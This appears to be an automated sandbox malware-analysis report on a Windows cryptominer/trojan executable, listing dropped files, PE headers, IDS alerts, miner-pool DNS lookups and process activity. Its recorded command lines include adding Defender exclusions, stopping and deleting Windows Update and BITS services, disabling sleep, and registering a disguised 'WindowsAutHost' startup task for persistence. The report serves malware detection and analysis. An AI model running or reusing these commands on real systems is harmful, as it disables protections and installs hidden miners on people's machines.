                      Preview:PSMODULECACHE.F..._.%.....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_.o.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1296
                      Entropy (8bit):5.325148069001705
                      Encrypted:false
                      SSDEEP:24:3voPpQrLAo4KAxCoO515qRPD426ZnCvK39tCKnKJRSF8PwmgR:gPerB4BO1qRL/EnCvO9tC4aR48XgR
                      MD5:37DB7F22FC02B6EFAC0E8675934D3C2A
                      SHA1:2D32AF4F42701B2A36048E61B63FC60756C20EDB
                      SHA-256:3DF67EC75B01E9D0364DC2A20692F95CA7FC9E9E52733D54A971DA461356A613
                      SHA-512:36BF64FE98F0FB5DE150DB8873B1BBAD7FA4D75F21034C54AC017CAB69D687D38A2DBA9BC908861E351149CA8BA71C1CCE2D3205BE680A6A670D7CAD989EA86D
                      Malicious:false
                      Preview:@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                      C:\Windows\Temp\34E5.tmp

                      Download File
                      Process:C:\Program Files\WindowsServices\WindowsAutHost
                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):266240
                      Entropy (8bit):6.182593563213917
                      Encrypted:false
                      SSDEEP:6144:D7qMEtKgDp5foyLqqDIE3scZOfGna88WUM5eq0L:DrEIgXf7f1sGa8lN0L
                      MD5:94429096FE837680139AAFE94441EE5C
                      SHA1:376FB295532686CA49122AF5BE091BC32C66F29E
                      SHA-256:EEE4936DB8F467E8F9EAEFB2E351C6F1ADF3FEB6D428FD512D8C274852D2C2E8
                      SHA-512:CA51A2241D90F7379B0DB500850CA60EDCA59884ACBA1B50D850DDA7E1FE2623D71096B0BDB3D179643E4151582E595917760A8406395CEB4B22E3A3A3421036
                      Malicious:true
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....`c...............$.......................@....................................#.....`... ..............................................0..x....p...........8..........................................@z..(...................`4...............................text...............................`.P`.data...p!... ..."..................@.`..rdata...O...P...P...2..............@.`@.pdata...8.......:..................@.0@.xdata...0.......2..................@.0@.bss......... ........................`..idata..x....0......................@.0..CRT....x....P......................@.@..tls.........`......................@.@..rsrc........p......................@.0..reloc..............................@.0B........................................................................................................................................................................

                      C:\Windows\Temp\__PSScriptPolicyTest_32jamkpp.4mi.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Windows\Temp\__PSScriptPolicyTest_ffpo0wmq.mzb.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Windows\Temp\__PSScriptPolicyTest_g0kgqlbe.s0w.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Windows\Temp\__PSScriptPolicyTest_g514tq1x.qwo.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Windows\Temp\__PSScriptPolicyTest_i3zhazvf.mrd.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:modified
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Windows\Temp\__PSScriptPolicyTest_lfxy1ebj.tar.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      Static File Info

                      General

                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Entropy (8bit):7.965431525486837
                      TrID:
                      • Win64 Executable (generic) (12005/4) 74.95%
                      • Generic Win/DOS Executable (2004/3) 12.51%
                      • DOS Executable Generic (2002/1) 12.50%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                      File name:8iTXwpHCHb.exe
                      File size:9861120
                      MD5:e6001aac5a3ee379149fd36bb6fb0d6f
                      SHA1:071044b203de973c31e2504411cfa445b95402cf
                      SHA256:e244f4b3b1614865dcd266ca2e057a1d7aa2a09c87bc1feb823fb1ac858f4fa2
                      SHA512:f0f43f07b75aa5c705078e804a03ab786566bf4684211cfb88fd407c344b89dbdbac150768ed8a4a66c5e3d9f414572b7892cb0211ecfc7806fd31e376716d59
                      SSDEEP:196608:lKhSUcGJi2WNOVCjJ81tMeO3PNa/fm9BPq+lIx2YBWO:KYWi2WqCjJMmc/b+lNk
                      TLSH:3DA623FE219C2358C017CC649533ED09B2BA521E47F8999D7DDEBAC06FAF8189521F42
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....`c...............$......?................@....................................i.....`... ............................

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x140c51bb6
                      Entrypoint Section:.u4~
                      Digitally signed:false
                      Imagebase:0x140000000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x6360CAA6 [Tue Nov 1 07:28:38 2022 UTC]
                      TLS Callbacks:0x40c4c18a, 0x1, 0x4000e800, 0x1, 0x4000e7d0, 0x1, 0x4000f350, 0x1, 0x40013890, 0x1
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:2
                      File Version Major:5
                      File Version Minor:2
                      Subsystem Version Major:5
                      Subsystem Version Minor:2
                      Import Hash:9cbeaf2511bbe838a31e03a5717a082b

                      Entrypoint Preview

                      Instruction
                      inc ecx
                      push esi
                      dec ecx
                      mov esi, 58832A59h
                      sbb edi, dword ptr [eax+0Fh]
                      or dword ptr [ecx+0Fh], ecx
                      into
                      call 00007F68249B9742h
                      dec esp
                      mov ebp, dword ptr [esp+18h]
                      dec eax
                      add dword ptr [esp+00h], BF376412h
                      call 00007F68249DAF69h
                      dec ebx
                      fstp9 st(3)
                      mov bh, 9Fh
                      cmpsb
                      retf 467Fh
                      dec byte ptr [ebx+esi*4+29h]
                      mov ecx, D2266D3Ch
                      mov eax, 310D0E3Ch
                      inc esi
                      xchg eax, ebx
                      push ecx
                      aam 47h
                      loopne 00007F6824E3E5C9h
                      push eax
                      cmp eax, 0F83C7BBh
                      js 00007F6824E3E507h
                      out D9h, eax
                      pop ebx
                      test dword ptr [esi+01h], BBE4F616h
                      xchg byte ptr [edx], ah
                      or bl, ch
                      mov eax, 97930DEBh
                      mov bh, ACh
                      add al, 77h
                      inc esi
                      sbb byte ptr [edx+7Dh], cl
                      and dword ptr [ecx-2517ACCEh], edi
                      mov eax, 39C3583Ah
                      inc esi
                      cwde
                      cli
                      lahf
                      fadd qword ptr [edi+06h]
                      rcr dword ptr [esi+45A1BB35h], FFFFFFC1h
                      jo 00007F6824E3E507h
                      sbb al, F7h
                      xchg eax, ebp
                      inc dword ptr [esi+4Fh]
                      and dword ptr [eax-65h], 6Fh
                      push esp
                      xor bh, byte ptr [ebp-6Dh]
                      pop ds
                      jle 00007F6824E3E4E4h
                      sti
                      insb
                      rcr byte ptr [edi+6Bh], 1
                      leave
                      sar dword ptr [eax-4Ah], 1
                      push eax
                      xchg eax, edi
                      iretd
                      test dword ptr [edx], eax
                      dec edx
                      js 00007F6824E3E58Ch
                      aam CBh
                      adc dword ptr [esi-6Ch], esp
                      xchg eax, ecx
                      and eax, 943A45A7h

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc2a5f80x8c.u4~
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x10bd0000x4f2.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x10b5ec00x6120.u4~
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10bc0000xdc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x880a900x28.u4~
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x7550000x90.7Z\
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x31c080x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x330000x3b7d300x0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata0x3eb0000x50f00x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .pdata0x3f10000x38f40x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .xdata0x3f50000x31200x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .bss0x3f90000xfa00x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata0x3fa0000x13140x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .CRT0x3fc0000x780x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .tls0x3fd0000x100x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .HJN0x3fe0000x3564e80x0unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .7Z\0x7550000xae80xc00False0.02734375data0.14971851228902108IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .u4~0x7560000x965fe00x966000unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .reloc0x10bc0000xdc0x200False0.341796875data2.140624816061037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .rsrc0x10bd0000x4f20x600False0.3411458333333333data4.822785617605431IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_MANIFEST0x10bd0580x49aXML 1.0 document, ASCII textEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllAddAtomA
                      msvcrt.dll___lc_codepage_func
                      SHELL32.dllSHGetFolderPathW
                      KERNEL32.dllGetVersion
                      USER32.dllCharUpperBuffW
                      KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, ExitProcess, LoadLibraryA, GetModuleHandleA, GetProcAddress

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.4199.247.19.11649695802831812 11/02/22-12:58:39.104701TCP2831812ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)4969580192.168.2.4199.247.19.116
                      192.168.2.48.8.8.856572532036289 11/02/22-12:58:39.057419UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)5657253192.168.2.48.8.8.8
                      192.168.2.431.31.198.10649696802035420 11/02/22-12:58:40.227957TCP2035420ET TROJAN Win32/Pripyat Activity (POST)4969680192.168.2.431.31.198.106

                      Network Port Distribution

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 2, 2022 12:58:39.057419062 CET5657253192.168.2.48.8.8.8
                      Nov 2, 2022 12:58:39.076940060 CET53565728.8.8.8192.168.2.4
                      Nov 2, 2022 12:58:40.100507021 CET5091153192.168.2.48.8.8.8
                      Nov 2, 2022 12:58:40.164290905 CET53509118.8.8.8192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Nov 2, 2022 12:58:39.057419062 CET192.168.2.48.8.8.80xe9eStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                      Nov 2, 2022 12:58:40.100507021 CET192.168.2.48.8.8.80xaaddStandard query (0)panel294756.siteA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Nov 2, 2022 12:58:39.076940060 CET8.8.8.8192.168.2.40xe9eNo error (0)pool.hashvault.pro199.247.19.116A (IP address)IN (0x0001)false
                      Nov 2, 2022 12:58:39.076940060 CET8.8.8.8192.168.2.40xe9eNo error (0)pool.hashvault.pro136.244.80.197A (IP address)IN (0x0001)false
                      Nov 2, 2022 12:58:40.164290905 CET8.8.8.8192.168.2.40xaaddNo error (0)panel294756.site31.31.198.106A (IP address)IN (0x0001)false

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:12:56:29
                      Start date:02/11/2022
                      Path:C:\Users\user\Desktop\8iTXwpHCHb.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Users\user\Desktop\8iTXwpHCHb.exe
                      Imagebase:0x7ff6d2ea0000
                      File size:9861120 bytes
                      MD5 hash:E6001AAC5A3EE379149FD36BB6FB0D6F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Target ID:1
                      Start time:12:56:34
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Target ID:2
                      Start time:12:56:34
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:4
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:5
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:6
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:7
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Target ID:8
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
